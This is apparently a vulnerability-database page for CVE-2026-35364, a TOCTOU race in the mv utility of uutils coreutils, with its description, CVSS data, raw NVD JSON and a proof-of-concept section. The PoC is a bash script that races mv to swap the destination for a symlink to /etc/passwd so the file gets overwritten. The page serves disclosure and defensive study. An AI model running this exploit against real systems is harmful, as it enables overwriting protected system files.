Security Vulnerability Report
中文
CVE-2026-35364 CVSS 6.3 MEDIUM

CVE-2026-35364

Published: 2026-04-22 17:16:40
Last Modified: 2026-04-24 19:19:12
Source: [email protected]

Description

A Time-of-Check to Time-of-Use (TOCTOU) race condition exists in the mv utility of uutils coreutils during cross-device operations. The utility removes the destination path before recreating it through a copy operation. A local attacker with write access to the destination directory can exploit this window to replace the destination with a symbolic link. The subsequent privileged move operation will follow the symlink, allowing the attacker to redirect the write and overwrite an arbitrary target file with contents from the source.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:uutils:coreutils:-:*:*:*:*:rust:*:* - VULNERABLE
uutils coreutils (修复CVE-2026-35364之前的版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/bin/bash # PoC for CVE-2026-35364: Exploiting TOCTOU in uutils mv cross-device move # Prerequisites: Attacker has write access to the destination directory. # Usage: Run this script in the background while a privileged user runs 'mv src dest'. DEST_DIR="/tmp/vuln_dir" DEST_FILE="$DEST_DIR/target" TARGET_FILE="/etc/passwd" # Arbitrary file to overwrite # Ensure destination directory exists and is empty (setup) mkdir -p "$DEST_DIR" touch "$DEST_FILE" echo "[+] Starting race condition exploit..." while true; do # Check if the destination file has been removed by mv if [ ! -e "$DEST_FILE" ]; then # Race window: mv has deleted the file but not yet created the new one # Replace it with a symlink to the target file ln -s "$TARGET_FILE" "$DEST_FILE" 2>/dev/null if [ $? -eq 0 ]; then echo "[!] Symlink created successfully. Target may be overwritten." break fi fi done

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35364", "sourceIdentifier": "[email protected]", "published": "2026-04-22T17:16:39.737", "lastModified": "2026-04-24T19:19:11.777", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Time-of-Check to Time-of-Use (TOCTOU) race condition exists in the mv utility of uutils coreutils during cross-device operations. The utility removes the destination path before recreating it through a copy operation. A local attacker with write access to the destination directory can exploit this window to replace the destination with a symbolic link. The subsequent privileged move operation will follow the symlink, allowing the attacker to redirect the write and overwrite an arbitrary target file with contents from the source."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-367"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uutils:coreutils:-:*:*:*:*:rust:*:*", "matchCriteriaId": "4A9AF9E4-E17C-48AD-8051-B49998618839"}]}]}], "references": [{"url": "https://github.com/uutils/coreutils/issues/10015", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/uutils/coreutils/issues/10015", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.